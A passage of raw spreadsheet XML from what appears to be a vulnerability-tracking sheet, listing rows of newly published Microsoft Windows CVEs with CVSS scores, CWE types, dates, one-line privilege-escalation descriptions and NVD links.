t="inlineStr" /><c r="H554" s="5" t="n"><v>0.003</v></c><c r="I554" s="5" t="inlineStr" /><c r="J554" s="5" t="inlineStr" /><c r="K554" s="5" t="inlineStr" /><c r="L554" s="5" t="inlineStr" /><c r="M554" s="5" t="inlineStr" /><c r="N554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P554" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q554" s="5" t="inlineStr" /><c r="R554" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S554" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t></is></c></row><row r="555"><c r="A555" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C555" s="5" t="inlineStr"><is><t>CVE-2026-69687</t></is></c><c r="D555" s="5" t="n"><v>7.8</v></c><c r="E555" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F555" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G555" s="5" t="inlineStr" /><c r="H555" s="5" t="n"><v>0.003</v></c><c r="I555" s="5" t="inlineStr" /><c r="J555" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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55" s="5" t="inlineStr" /><c r="M555" s="5" t="inlineStr" /><c r="N555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P555" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q555" s="5" t="inlineStr" /><c r="R555" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S555" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t></is></c></row><row r="556"><c r="A556" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C556" s="5" t="inlineStr"><is><t>CVE-2026-69691</t></is></c><c r="D556" s="5" t="n"><v>7.8</v></c><c r="E556" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F556" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G556" s="5" t="inlineStr" /><c r="H556" s="5" t="n"><v>0.003</v></c><c r="I556" s="5" t="inlineStr" /><c r="J556" s="5" t="inlineStr" /><c r="K556" s="5" t="inlineStr" /><c r="L556" s="5" t="inlineStr" /><c r="M556" s="5" t="inlineStr" /><c r="N556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P556" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q556" s="5" t="inlineStr" /><c r="R556" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S556" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t></is></c></row><row r="557"><c r="A557" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C557" s="5" t="inlineStr"><is><t>CVE-2026-69707</t></is></c><c r="D557" s="5" t="n"><v>7.8</v></c><c r="E557" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F557" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G557" s="5" t="inlineStr" /><c r="H557" s="5" t="n"><v>0.003</v></c><c r="I557" s="5" t="inlineStr" /><c r="J557" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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57" s="5" t="inlineStr" /><c r="M557" s="5" t="inlineStr" /><c r="N557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P557" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q557" s="5" t="inlineStr" /><c r="R557" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S557" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t></is></c></row><row r="558"><c r="A558" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C558" s="5" t="inlineStr"><is><t>CVE-2026-69709</t></is></c><c r="D558" s="5" t="n"><v>7.8</v></c><c r="E558" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F558" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G558" s="5" t="inlineStr" /><c r="H558" s="5" t="n"><v>0.003</v></c><c r="I558" s="5" t="inlineStr" /><c r="J558" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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58" s="5" t="inlineStr" /><c r="M558" s="5" t="inlineStr" /><c r="N558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P558" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q558" s="5" t="inlineStr" /><c r="R558" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S558" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t></is></c></row><row r="559"><c r="A559" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C559" s="5" t="inlineStr"><is><t>CVE-2026-69720</t></is></c><c r="D559" s="5" t="n"><v>7.8</v></c><c r="E559" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F559" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G559" s="5" t="inlineStr" /><c r="H559" s="5" t="n"><v>0.003</v></c><c r="I559" s="5" t="inlineStr" /><c r="J559" s="5" t="inlineStr" /><c r="K559" s="5" t="inlineStr" /><c r="L559" s="5" t="inlineStr" /><c r="M559" s="5" t="inlineStr" /><c r="N559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P559" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q559" s="5" t="inlineStr" /><c r="R559" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S559" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t></is></c></row><row r="560"><c r="A560" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C560" s="5" t="inlineStr"><is><t>CVE-2026-69725</t></is></c><c r="D560" s="5" t="n"><v>7.8</v></c><c r="E560" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F560" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G560" s="5" t="inlineStr" /><c r="H560" s="5" t="n"><v>0.003</v></c><c r="I560" s="5" t="inlineStr" /><c r="J560" s="5" t="inlineStr" /><c r="K560" s="5" t="inlineStr" /><c r="L560" s="5" t="inlineStr" /><c r="M560" s="5" t="inlineStr" /><c r="N560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P560" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q560" s="5" t="inlineStr" /><c r="R560" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S560" s="5" t="inlineStr"><is><t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t></is></c></row><row r="561"><c r="A561" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C561" s="5" t="inlineStr"><is><t>CVE-2026-69731</t></is></c><c r="D561" s="5" t="n"><v>7.8</v></c><c r="E561" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F561" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G561" s="5" t="inlineStr" /><c r="H561" s="5" t="n"><v>0.003</v></c><c r="I561" s="5" t="inlineStr" /><c r="J561" s="5" t="inlineStr" /><c r="K561" s="5" t="inlineStr" /><c r="L561" s="5" t="inlineStr" /><c r="M561" s="5" t="inlineStr" /><c r="N561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P561" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q561" s="5" t="inlineStr" /><c r="R561" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S561" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t></is></c></row><row r="562"><c r="A562" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C562" s="5" t="inlineStr"><is><t>CVE-2026-69738</t></is></c><c r="D562" s="5" t="n"><v>7.8</v></c><c r="E562" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F562" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G562" s="5" t="inlineStr" /><c r="H562" s="5" t="n"><v>0.003</v></c><c r="I562" s="5" t="inlineStr" /><c r="J562" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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62" s="5" t="inlineStr" /><c r="M562" s="5" t="inlineStr" /><c r="N562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P562" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q562" s="5" t="inlineStr" /><c r="R562" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S562" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t></is></c></row><row r="563"><c r="A563" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C563" s="5" t="inlineStr"><is><t>CVE-2026-69758</t></is></c><c r="D563" s="5" t="n"><v>7.8</v></c><c r="E563" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F563" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G563" s="5" t="inlineStr" /><c r="H563" s="5" t="n"><v>0.003</v></c><c r="I563" s="5" t="inlineStr" /><c r="J563" s="5" t="inlineStr" /><c r="K563" s="5" t="inlineStr" /><c r="L563" s="5" t="inlineStr" /><c r="M563" s="5" t="inlineStr" /><c r="N563" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P563" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q563" s="5" t="inlineStr" /><c r="R563" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S563" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t></is></c></row><row r="564"><c r="A564" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C564" s="5" t="inlineStr"><is><t>CVE-2026-69785</t></is></c><c r="D564" s="5" t="n"><v>7.8</v></c><c r="E564" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F564" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G564" s="5" t="inlineStr" /><c r="H564" s="5" t="n"><v>0.003</v></c><c r="I564" s="5" t="inlineStr" /><c r="J564" s="5" t="inlineStr" /><c r="K564" s="5" t="inlineStr" /><c r="L564" s="5" t="inlineStr" /><c r="M564" s="5" t="inlineStr" /><c r="N564" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P564" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q564" s="5" t="inlineStr" /><c r="R564" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S564" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t></is></c></row><row r="565"><c r="A565" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C565" s="5" t="inlineStr"><is><t>CVE-2026-69787</t></is></c><c r="D565" s="5" t="n"><v>7.8</v></c><c r="E565" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F565" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G565" s="5" t="inlineStr" /><c r="H565" s="5" t="n"><v>0.003</v></c><c r="I565" s="5" t="inlineStr" /><c r="J565" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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65" s="5" t="inlineStr" /><c r="M565" s="5" t="inlineStr" /><c r="N565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P565" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q565" s="5" t="inlineStr" /><c r="R565" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S565" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t></is></c></row><row r="566"><c r="A566" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C566" s="5" t="inlineStr"><is><t>CVE-2026-69790</t></is></c><c r="D566" s="5" t="n"><v>7.8</v></c><c r="E566" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F566" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G566" s="5" t="inlineStr" /><c r="H566" s="5" t="n"><v>0.003</v></c><c r="I566" s="5" t="inlineStr" /><c r="J566" s="5" t="inlineStr" /><c r="K566" s="5" t="inlineStr" /><c r="L566" s="5" t="inlineStr" /><c r="M566" s="5" t="inlineStr" /><c r="N566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P566" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q566" s="5" t="inlineStr" /><c r="R566" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S566" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t></is></c></row><row r="567"><c r="A567" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C567" s="5" t="inlineStr"><is><t>CVE-2026-69799</t></is></c><c r="D567" s="5" t="n"><v>7.8</v></c><c r="E567" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F567" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G567" s="5" t="inlineStr" /><c r="H567" s="5" t="n"><v>0.002</v></c><c r="I567" s="5" t="inlineStr" /><c r="J567" s="5" t="inlineStr" /><c r="K567" s="5" t="inlineStr" /><c r="L567" s="5" t="inlineStr" /><c r="M567" s="5" t="inlineStr" /><c r="N567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P567" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q567" s="5" t="inlineStr" /><c r="R567" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S567" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t></is></c></row><row r="568"><c r="A568" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C568" s="5" t="inlineStr"><is><t>CVE-2026-69801</t></is></c><c r="D568" s="5" t="n"><v>7.8</v></c><c r="E568" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F568" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G568" s="5" t="inlineStr" /><c r="H568" s="5" t="n"><v>0.003</v></c><c r="I568" s="5" t="inlineStr" /><c r="J568" s="5" t="inlineStr" /><c r="K568" s="5" t="inlineStr" /><c r="L568" s="5" t="inlineStr" /><c r="M568" s="5" t="inlineStr" /><c r="N568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P568" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q568" s="5" t="inlineStr" /><c r="R568" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S568" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t></is></c></row><row r="569"><c r="A569" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C569" s="5" t="inlineStr"><is><t>CVE-2026-69821</t></is></c><c r="D569" s="5" t="n"><v>7.8</v></c><c r="E569" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F569" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G569" s="5" t="inlineStr" /><c r="H569" s="5" t="n"><v>0.003</v></c><c r="I569" s="5" t="inlineStr" /><c r="J569" s="5" t="inlineStr" /><c r="K569" s="5" t="inlineStr" /><c r="L569" s="5" t="inlineStr" /><c r="M569" s="5" t="inlineStr" /><c r="N569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P569" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q569" s="5" t="inlineStr" /><c r="R569" s="5" t="inlineStr"><is><t>CWE-116</t></is></c><c r="S569" s="5" t="inlineStr"><is><t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t></is></c></row><row r="570"><c r="A570" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C570" s="5" t="inlineStr"><is><t>CVE-2026-69822</t></is></c><c r="D570" s="5" t="n"><v>7.8</v></c><c r="E570" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F570" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G570" s="5" t="inlineStr" /><c r="H570" s="5" t="n"><v>0.003</v></c><c r="I570" s="5" t="inlineStr" /><c r="J570" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K570"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570" s="5" t="inlineStr" /><c r="M570" s="5" t="inlineStr" /><c r="N570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P570" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q570" s="5" t="inlineStr" /><c r="R570" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S570" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t></is></c></row><row r="571"><c r="A571" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C571" s="5" t="inlineStr"><is><t>CVE-2026-69841</t></is></c><c r="D571" s="5" t="n"><v>7.8</v></c><c r="E571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F571" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G571" s="5" t="inlineStr" /><c r="H571" s="5" t="n"><v>0.003</v></c><c r="I571" s="5" t="inlineStr" /><c r="J571" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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1" s="5" t="inlineStr" /><c r="M571" s="5" t="inlineStr" /><c r="N571" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P571" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q571" s="5" t="inlineStr" /><c r="R571" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S571" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t></is></c></row><row r="572"><c r="A572" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C572" s="5" t="inlineStr"><is><t>CVE-2026-69844</t></is></c><c r="D572" s="5" t="n"><v>7.8</v></c><c r="E572" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F572" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G572" s="5" t="inlineStr" /><c r="H572" s="5" t="n"><v>0.003</v></c><c r="I572" s="5" t="inlineStr" /><c r="J572" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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2" s="5" t="inlineStr" /><c r="M572" s="5" t="inlineStr" /><c r="N572" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P572" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q572" s="5" t="inlineStr" /><c r="R572" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S572" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t></is></c></row><row r="573"><c r="A573" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C573" s="5" t="inlineStr"><is><t>CVE-2026-69864</t></is></c><c r="D573" s="5" t="n"><v>7.8</v></c><c r="E573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F573" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G573" s="5" t="inlineStr" /><c r="H573" s="5" t="n"><v>0.002</v></c><c r="I573" s="5" t="inlineStr" /><c r="J573" s="5" t="inlineStr" /><c r="K573" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L573" s="5" t="inlineStr" /><c r="M573" s="5" t="inlineStr" /><c r="N573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P573" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q573" s="5" t="inlineStr" /><c r="R573" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S573" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t></is></c></row><row r="574"><c r="A574" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C574" s="5" t="inlineStr"><is><t>CVE-2026-69900</t></is></c><c r="D574" s="5" t="n"><v>7.8</v></c><c r="E574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F574" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G574" s="5" t="inlineStr" /><c r="H574" s="5" t="n"><v>0.003</v></c><c r="I574" s="5" t="inlineStr" /><c r="J574" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K574" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L574" s="5" t="inlineStr" /><c r="M574" s="5" t="inlineStr" /><c r="N574" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P574" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q574" s="5" t="inlineStr" /><c r="R574" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S574" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t></is></c></row><row r="575"><c r="A575" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C575" s="5" t="inlineStr"><is><t>CVE-2026-69907</t></is></c><c r="D575" s="5" t="n"><v>7.8</v></c><c r="E575" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F575" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G575" s="5" t="inlineStr" /><c r="H575" s="5" t="n"><v>0.003</v></c><c r="I575" s="5" t="inlineStr" /><c r="J575" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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75" s="5" t="inlineStr" /><c r="M575" s="5" t="inlineStr" /><c r="N575" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P575" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q575" s="5" t="inlineStr" /><c r="R575" s="5" t="inlineStr"><is><t>CWE-280</t></is></c><c r="S575" s="5" t="inlineStr"><is><t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t></is></c></row><row r="576"><c r="A576" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C576" s="5" t="inlineStr"><is><t>CVE-2026-69921</t></is></c><c r="D576" s="5" t="n"><v>7.8</v></c><c r="E576" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F576" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G576" s="5" t="inlineStr" /><c r="H576" s="5" t="n"><v>0.003</v></c><c r="I576" s="5" t="inlineStr" /><c r="J576" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K576" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L576" s="5" t="inlineStr" /><c r="M576" s="5" t="inlineStr" /><c r="N576" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P576" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q576" s="5" t="inlineStr" /><c r="R576" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S576" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c 